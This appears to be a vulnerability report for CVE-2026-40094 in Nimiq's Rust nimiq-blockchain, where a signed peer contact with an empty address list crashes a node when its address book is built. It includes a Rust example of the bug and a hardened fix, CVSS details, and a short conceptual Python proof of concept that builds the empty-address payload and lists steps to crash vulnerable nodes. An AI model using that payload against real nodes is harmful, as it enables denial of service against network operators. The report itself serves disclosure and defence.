Security Vulnerability Report
CVE-2026-40094 CVSS 4.3 MEDIUM

Published: 2026-05-20 22:16:37
Last Modified: 2026-05-21 16:04:54

Description

nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In versions 1.3.0 and prior, network-libp2p discovery accepts signed PeerContact updates from untrusted peers and stores them in a peer contact book, which can eventually lead to a crash when the address book is built. A PeerContact can legally contain an empty addresses list (no intrinsic validation enforces that it is non-empty). Later, PeerContactBook::known_peers builds an address book by taking addresses.first().expect("every peer should have at least one address"). If an attacker has inserted a signed peer contact with addresses=[], any call to get_address_book (RPC/web client) can panic and crash the node or the RPC task, depending on panic settings. This issue has been fixed in version 1.4.0.
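The failure mode described above, reduced to a minimal model next to one way of hardening it. This is an added example, not Nimiq's code and not the 1.4.0 fix; all type, field and method names are assumptions, and signature verification is omitted because a valid signature does not prevent the empty list.

```rust
use std::collections::HashMap;

// Simplified stand-ins for the real types; all names here are assumptions.
#[derive(Clone)]
pub struct PeerContact {
    pub peer_id: String,
    pub addresses: Vec<String>,
}

#[derive(Default)]
pub struct PeerContactBook {
    contacts: HashMap<String, PeerContact>,
}

impl PeerContactBook {
    /// Pattern from the description: contact stored with no non-empty check.
    pub fn insert_unchecked(&mut self, c: PeerContact) {
        self.contacts.insert(c.peer_id.clone(), c);
    }
    /// Pattern from the description: panics on a contact with addresses=[].
    pub fn known_peers_panicking(&self) -> Vec<(String, String)> {
        self.contacts.values()
            .map(|c| (c.peer_id.clone(), c.addresses.first()
                .expect("every peer should have at least one address").clone()))
            .collect()
    }
    /// Hardened ingestion: enforce the invariant where untrusted data enters.
    pub fn insert_validated(&mut self, c: PeerContact) -> Result<(), &'static str> {
        if c.addresses.is_empty() {
            return Err("peer contact has no addresses");
        }
        self.contacts.insert(c.peer_id.clone(), c);
        Ok(())
    }
    /// Hardened read path: skip address-less contacts instead of panicking.
    pub fn known_peers(&self) -> Vec<(String, String)> {
        self.contacts.values()
            .filter_map(|c| c.addresses.first().map(|a| (c.peer_id.clone(), a.clone())))
            .collect()
    }
}

fn main() {
    // Constructed sample contact with an empty address list (not captured traffic).
    let mut book = PeerContactBook::default();
    book.insert_unchecked(PeerContact { peer_id: "peer-b".into(), addresses: vec![] });
    println!("tolerant read returns {} peers", book.known_peers().len());
}
```

Validating at insertion and tolerating bad entries on read are complementary: the second still protects a node whose contact book already holds an address-less entry.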

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

nimiq-blockchain <= 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

# Conceptual PoC for CVE-2026-40094
# This script demonstrates the structure of the malicious PeerContact payload.
# In a real scenario, this would be sent via the libp2p protocol to a vulnerable node.


def generate_malicious_peer_contact():
    # Construct a PeerContact object with an empty addresses list
    malicious_payload = {
        "public_key": "<attacker_public_key>",
        "signature": "<attacker_signature>",
        "addresses": [],  # The vulnerability trigger: Empty list
        "timestamp": 1716000000
    }
    return json.dumps(malicious_payload)


if __name__ == "__main__":
    print("[+] Generating malicious PeerContact payload...")
    payload = generate_malicious_peer_contact()
    print(f"[+] Payload: {payload}")
    print("[+] Send this payload to a vulnerable Nimiq node (v1.3.0 or earlier) via libp2p.")
    print("[+] Triggering get_address_book via RPC will cause the node to panic/crash.")
```

References

https://github.com/nimiq/core-rs-albatross/pull/3715
https://github.com/nimiq/core-rs-albatross/releases/tag/v1.4.0
https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-c45m-6x25-3cjq

Vulnerability status: Deferred
Weakness: CWE-754
Exploitability score: 2.8
Impact score: 1.4